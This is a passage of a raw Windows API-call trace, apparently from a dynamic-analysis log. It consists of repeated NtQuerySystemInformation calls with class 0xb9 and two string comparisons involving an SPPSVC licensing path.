NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0272.668] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0272.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0272.680] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, 